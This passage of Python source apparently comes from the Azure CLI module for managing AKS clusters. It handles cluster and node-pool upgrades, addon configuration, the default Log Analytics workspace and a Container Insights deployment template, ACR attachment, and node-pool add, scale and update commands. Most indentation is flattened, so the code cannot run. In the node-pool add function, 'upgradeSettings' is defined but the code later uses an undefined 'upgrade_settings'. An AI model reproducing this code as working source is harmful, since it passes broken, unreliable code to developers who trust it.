break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node image version, use the "--node-image-only" option.')
if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
        # This is only a client-side convenience so customers can run az aks upgrade to upgrade all
        # node pools of a cluster. The SDK only supports upgrading a single node pool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. A node-image-only upgrade '
                               'can only be applied to a VirtualMachineScaleSets cluster.')
_upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pools will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
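# Illustrative invocation (hypothetical names and version): upgrade the control plane and all
# node pools; --control-plane-only or --node-image-only narrow the scope, as handled above.
#   az aks upgrade -g myResourceGroup -n myAKSCluster --kubernetes-version 1.19.7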
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
        using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
    :param endpoint_type: The endpoint type to be used for an Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
        using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
    # for each addon argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   f'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
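# Illustrative call (arguments abbreviated): _handle_addons_args(cmd, 'monitoring,kube-dashboard',
# subscription_id, resource_group_name, {}) returns a dict keyed by CONST_MONITORING_ADDON_NAME
# (configured with a Log Analytics workspace resource id, defaulted if none was supplied) and
# CONST_KUBE_DASHBOARD_ADDON_NAME, both enabled.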
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
    # currently Log Analytics is supported only in the China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
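    # Illustrative result (hypothetical subscription): for a resource group in eastus this yields
    #   default_workspace_resource_group: DefaultResourceGroup-EUS
    #   default_workspace_name:           DefaultWorkspace-<subscription-id>-EUS
    #   default_workspace_resource_id:    /subscriptions/<subscription-id>/resourceGroups/
    #                                     DefaultResourceGroup-EUS/providers/Microsoft.OperationalInsights/
    #                                     workspaces/DefaultWorkspace-<subscription-id>-EUS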
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
    # The workspace region can differ from the resource group region, so look up the location of workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists. Please try a different name, or "
                           "use 'az aks nodepool list' to get the current list of node pools.".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
        upgrade_settings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
        upgrade_settings=upgrade_settings,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
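    """Scale a node pool to the requested node count.

    Scaling is rejected when the cluster autoscaler is enabled on the pool or when
    the requested count equals the current count.
    """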
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
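    """Upgrade a node pool to a new Kubernetes version, or upgrade only its node image.

    --kubernetes-version and --node-image-only are mutually exclusive.
    """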
if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade the node image version. '
                       'If you only want to upgrade the node image version, please use "--node-image-only".')
if node_image_only:
managed_cluster_client = cf_managed_clusters(cmd.cli_ctx)
return _upgrade_single_nodepool_image_version(no_wait,
managed_cluster_client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
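    """Update autoscaler settings, tags, mode or max surge for a node pool.

    At most one of the enable/disable/update cluster-autoscaler flags may be set,
    and at least one of those flags, --tags, --mode or --max-surge must be provided.
    """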
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
        raise CLIError('Please specify only one of "--enable-cluster-autoscaler", '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
